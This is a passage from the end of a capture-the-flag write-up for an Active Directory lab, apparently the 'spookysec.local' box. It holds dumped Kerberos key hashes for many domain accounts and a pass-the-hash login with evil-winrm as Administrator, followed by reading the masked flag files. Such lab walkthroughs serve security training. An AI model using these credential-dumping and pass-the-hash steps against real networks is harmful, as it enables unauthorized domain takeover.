spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:6107bedbb5baabcc22813b5ffb187ca01abd47c01700016ec2b843a4c3994b54
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:cd0c0da9ee828cd342853de2a209d2f4
ATTACKTIVEDIREC$:des-cbc-md5:9426b6febf6dc2ab
[*] Cleaning up...
Looting
└─$ evil-winrm -u Administrator -i 10.10.204.111 -H 0e0363213e37b94221497260b0bcb4fc 1 ⨯
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents>
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> dir
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> cd ..\Desktop
dir[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 11:39 AM 32 root.txt
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> type root.txt
********
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> cd ..\..\backup\Desktop
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\backup\Desktop> dir
Directory: C:\Users\backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:19 PM 26 PrivEsc.txt
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\backup\Desktop> type PrivEsc.txt
******
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-admin\Desktop> dir
Directory: C:\Users\svc-admin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:18 PM 28 user.txt.txt
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-admin\Desktop> type user.txt.txt
******
GGWP!